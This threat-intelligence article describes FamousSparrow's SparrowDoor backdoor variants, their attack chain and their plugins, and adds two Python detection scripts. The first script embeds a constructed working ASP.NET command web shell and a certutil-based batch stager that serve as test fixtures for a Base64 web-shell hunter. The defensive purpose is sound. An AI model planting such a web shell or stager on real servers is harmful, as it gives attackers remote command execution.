
SparrowDoor Backdoor Variants

The Chinese cyber espionage group known as FamousSparrow has been linked to fresh attacks on a U.S. trade group and a Mexican research institute, deploying its notorious SparrowDoor backdoor alongside the ShadowPad malware. The activity, observed in July 2024, marks the first time the group has leveraged ShadowPad, a tool frequently used by Chinese state-sponsored actors.

The Evolution of SparrowDoor: A More Sophisticated Threat

FamousSparrow has introduced two new variants of its SparrowDoor backdoor, one of which is modular. Both add parallel command execution: each command runs in its own thread, so a long-running task no longer blocks the others.

This is a major upgrade over earlier versions, which processed commands one at a time. File operations and interactive shell sessions can now run without stalling whatever else the backdoor is doing.

A History of Espionage: FamousSparrow’s Notable Attacks

Initially uncovered in September 2021, FamousSparrow has been linked to cyber attacks on hotels, governments, engineering firms and law offices. The group has previously operated independently, using SparrowDoor as its exclusive implant.

Over time, researchers have observed tactical similarities between FamousSparrow and other Chinese hacking groups like Earth Estries, GhostEmperor, and Salt Typhoon, the latter known for targeting the telecom sector. However, despite these overlaps, FamousSparrow remains classified as a distinct threat group with unique characteristics.

The Attack Chain: How the Breach Unfolded

The attack begins with FamousSparrow deploying a web shell on an internet-facing IIS server. The exact method of initial access is unknown, but both affected organizations were running outdated versions of Windows Server and Microsoft Exchange Server, so exploitation of an unpatched service is the likely entry point.

Once the web shell is in place, it serves as a launchpad for a remote batch script. This script drops and runs a Base64-encoded .NET web shell, which in turn deploys both SparrowDoor and ShadowPad onto the compromised system.
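A practical way to hunt for the staging step described above is to look for batch scripts and ASP.NET handler files that carry a long Base64 blob which, once decoded, contains .NET web shell code. The script below is an added example, not code from the original article or from ESET; the web shell source, the `update.bat` stager and the marker strings are constructed for the demonstration and are not published SparrowDoor indicators. The use of `certutil -decode` in the sample stager is a hypothetical staging technique chosen for illustration, not the method attributed to FamousSparrow.

```python
"""Hunt for Base64-encoded .NET web shells staged by batch scripts (added example)."""
import base64
import binascii
import re
import tempfile
from pathlib import Path

# Strings that, once a blob is decoded, suggest a .NET web shell. Generic markers
# chosen for the example, not published SparrowDoor indicators.
WEBSHELL_MARKERS = (
    b"<%@ Page",
    b"System.Diagnostics.Process",
    b"ProcessStartInfo",
    b"Request.Form",
    b"Request[",
    b"cmd.exe",
)

# A run of at least 64 Base64 alphabet characters, optionally padded.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{64,}={0,2}")

# Batch stagers, scripts and the ASP.NET handler types a web shell is dropped as.
SCAN_SUFFIXES = {".bat", ".cmd", ".ps1", ".aspx", ".ashx", ".asmx", ".txt"}


def decode_runs(data: bytes):
    """Yield (offset, decoded_bytes) for every Base64 run that decodes cleanly."""
    for m in B64_RUN.finditer(data):
        blob = m.group(0)
        if b"=" not in blob:
            blob = blob[: len(blob) - len(blob) % 4]  # drop a truncated tail
        try:
            yield m.start(), base64.b64decode(blob, validate=True)
        except (binascii.Error, ValueError):
            continue


def markers_in(decoded: bytes):
    """Return the web-shell markers present in a decoded blob, in table order."""
    return [m.decode() for m in WEBSHELL_MARKERS if m in decoded]


def scan_file(path: Path):
    """Report plaintext shells in ASP.NET files and encoded shells in any scanned file."""
    data = path.read_bytes()
    findings = []
    if path.suffix.lower() in {".aspx", ".ashx", ".asmx"}:
        hits = markers_in(data)
        if hits:
            findings.append({"file": path.name, "encoded": False, "markers": hits})
    for offset, decoded in decode_runs(data):
        hits = markers_in(decoded)
        # A long Base64 blob on its own is not evidence: ViewState, images and
        # attachments look the same. Only alert when the decoded content matches.
        if hits:
            findings.append({"file": path.name, "encoded": True,
                             "offset": offset, "markers": hits})
    return findings


def scan_tree(root: Path):
    """Walk a web root or staging directory and collect findings for relevant files."""
    return [f for p in sorted(root.rglob("*"))
            if p.is_file() and p.suffix.lower() in SCAN_SUFFIXES
            for f in scan_file(p)]


# Constructed sample: a minimal ASP.NET command shell and a stager that writes it
# out Base64-encoded, plus a benign file carrying an unrelated Base64 attachment.
SHELL_SOURCE = (
    b'<%@ Page Language="C#" %><% var p = new System.Diagnostics.Process();'
    b' p.StartInfo = new ProcessStartInfo("cmd.exe", "/c " + Request["c"]);'
    b' p.StartInfo.RedirectStandardOutput = true; p.StartInfo.UseShellExecute = false;'
    b' p.Start(); Response.Write(p.StandardOutput.ReadToEnd()); %>'
)


def build_sample_tree(root: Path) -> Path:
    """Create the constructed sample files under root and return root."""
    encoded = base64.b64encode(SHELL_SOURCE)
    (root / "update.bat").write_bytes(  # hypothetical stager, not FamousSparrow's
        b"@echo off\r\n"
        b"echo " + encoded + b" > %TEMP%\\p.txt\r\n"
        b"certutil -decode %TEMP%\\p.txt C:\\inetpub\\wwwroot\\aspnet_client\\x.aspx\r\n"
    )
    benign = base64.b64encode(b"The quick brown fox jumps over the lazy dog. " * 3)
    (root / "notes.txt").write_bytes(b"attachment: " + benign + b"\r\n")
    return root


def run_demo():
    """Build the constructed sample in a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as d:
        return scan_tree(build_sample_tree(Path(d)))


if __name__ == "__main__":
    for finding in run_demo():
        print(finding)
```

Run against a real IIS web root and the directories a stager would write to; the marker list is the part to tune, since a Base64 blob by itself is far too common to alert on.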

How SparrowDoor Works: A Deep Dive into Its Capabilities

One of the new SparrowDoor variants shares similarities with Crowdoor, a previously documented backdoor. Both new versions, however, introduce substantial enhancements, including:

  • Parallel task execution – The backdoor can run multiple commands at once, so a long-running task does not block the rest.
  • Per-command threads – Each command is handled in a new thread that establishes its own, separate connection to the Command-and-Control (C&C) server.
  • Victim and command tracking – Each of those connections carries a unique victim ID and a command ID, which lets the C&C server match responses to the tasks it issued.
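Because every command opens its own C&C connection, the behaviour above has a network-side signature: one process opening a burst of separate connections to the same remote endpoint, rather than multiplexing over a single session. The script below is an added example (not from the original article or ESET) that runs this heuristic over constructed Sysmon Event ID 3 records in JSON-lines form; the process names, IP addresses, ports and timings are made up, and the 30-second window and threshold of four connections are assumptions to tune against a real baseline.

```python
"""Flag processes that open bursts of parallel connections to one endpoint (added example)."""
import json
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed Sysmon Event ID 3 (NetworkConnect) records, simplified to the fields
# used here. Nothing in this data is a real SparrowDoor indicator.
SAMPLE_LOG = r"""
{"UtcTime":"2024-07-15 09:00:01.000","ProcessId":4120,"Image":"C:\\ProgramData\\svc\\updater.exe","DestinationIp":"203.0.113.10","DestinationPort":443}
{"UtcTime":"2024-07-15 09:00:01.400","ProcessId":4120,"Image":"C:\\ProgramData\\svc\\updater.exe","DestinationIp":"203.0.113.10","DestinationPort":443}
{"UtcTime":"2024-07-15 09:00:02.100","ProcessId":4120,"Image":"C:\\ProgramData\\svc\\updater.exe","DestinationIp":"203.0.113.10","DestinationPort":443}
{"UtcTime":"2024-07-15 09:00:03.700","ProcessId":4120,"Image":"C:\\ProgramData\\svc\\updater.exe","DestinationIp":"203.0.113.10","DestinationPort":443}
{"UtcTime":"2024-07-15 09:00:05.200","ProcessId":4120,"Image":"C:\\ProgramData\\svc\\updater.exe","DestinationIp":"203.0.113.10","DestinationPort":443}
{"UtcTime":"2024-07-15 09:00:10.000","ProcessId":5580,"Image":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe","DestinationIp":"198.51.100.5","DestinationPort":443}
{"UtcTime":"2024-07-15 09:00:10.050","ProcessId":5580,"Image":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe","DestinationIp":"198.51.100.5","DestinationPort":443}
{"UtcTime":"2024-07-15 09:00:10.120","ProcessId":5580,"Image":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe","DestinationIp":"198.51.100.5","DestinationPort":443}
{"UtcTime":"2024-07-15 09:00:10.300","ProcessId":5580,"Image":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe","DestinationIp":"198.51.100.5","DestinationPort":443}
{"UtcTime":"2024-07-15 09:00:00.000","ProcessId":3312,"Image":"C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE","DestinationIp":"198.51.100.20","DestinationPort":443}
{"UtcTime":"2024-07-15 09:01:30.000","ProcessId":3312,"Image":"C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE","DestinationIp":"198.51.100.20","DestinationPort":443}
{"UtcTime":"2024-07-15 09:03:00.000","ProcessId":3312,"Image":"C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE","DestinationIp":"198.51.100.20","DestinationPort":443}
"""


def parse_events(log_text):
    """Parse JSON-lines Sysmon records into (time, image, pid, dst) dicts."""
    events = []
    for line in log_text.strip().splitlines():
        line = line.strip()
        if not line:
            continue
        rec = json.loads(line)
        events.append({
            "time": datetime.strptime(rec["UtcTime"], "%Y-%m-%d %H:%M:%S.%f"),
            "image": rec["Image"],
            "pid": int(rec["ProcessId"]),
            "dst": f'{rec["DestinationIp"]}:{rec["DestinationPort"]}',
        })
    return events


def parallel_connection_bursts(events, window=timedelta(seconds=30),
                               threshold=4, ignore_images=()):
    """Return processes whose connections to a single endpoint peak at or above
    `threshold` inside any `window`-long sliding interval.

    `ignore_images` is a lowercase list of executable names (browsers, updaters)
    known to open parallel connections legitimately. It is a triage aid only:
    an implant can be named chrome.exe, so pair it with signature or path checks.
    """
    by_key = defaultdict(list)
    for e in events:
        if e["image"].lower().rsplit("\\", 1)[-1] in ignore_images:
            continue
        by_key[(e["image"], e["pid"], e["dst"])].append(e["time"])

    alerts = []
    for (image, pid, dst), times in by_key.items():
        times.sort()
        recent = deque()  # connection times inside the current window
        peak = 0
        for t in times:
            recent.append(t)
            while t - recent[0] > window:
                recent.popleft()
            peak = max(peak, len(recent))
        if peak >= threshold:
            alerts.append({"image": image, "pid": pid, "dst": dst, "peak": peak})
    return alerts


if __name__ == "__main__":
    for alert in parallel_connection_bursts(parse_events(SAMPLE_LOG),
                                            ignore_images=("chrome.exe",)):
        print(alert)
```

On the sample data the `updater.exe` process is flagged with a peak of five connections in a few seconds, Outlook is not (its three connections are minutes apart), and Chrome is flagged unless it is placed on the ignore list, which is exactly the false-positive class the heuristic needs a baseline for.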

Beyond the new threading model, SparrowDoor retains a broad set of capabilities:

  • Proxying – It can act as a proxy, giving the operators a covert path for further communication.
  • Interactive shell – It can open shell sessions for real-time command execution.
  • File operations – It can read, write and modify files, and enumerate the file system to map out directories and data.
  • Host reconnaissance – It gathers detailed information about the compromised system.
  • Uninstall – When instructed, it removes itself from the host.

A Modular Approach: SparrowDoor’s Enhanced Version

The second, more advanced SparrowDoor variant introduces a modular, plugin-based design, expanding its capabilities through nine specialized modules:

  • Cmd – Execute system commands
  • CFile – Manage file operations
  • CKeylogPlug – Log keystrokes
  • CSocket – Establish a TCP proxy
  • CShell – Initiate interactive shell sessions
  • CTransf – Transfer files between the infected host and the C&C server
  • CRdp – Capture screenshots
  • CPro – List and terminate running processes
  • CFileMoniter – Track file system changes in specific directories

FamousSparrow: Still Active, Still Evolving

This recent wave of activity confirms that FamousSparrow is not only still active but also investing in the continuous development of its SparrowDoor backdoor. With the introduction of modular capabilities and the adoption of ShadowPad, the group is clearly evolving, posing an even more significant cybersecurity threat moving forward.
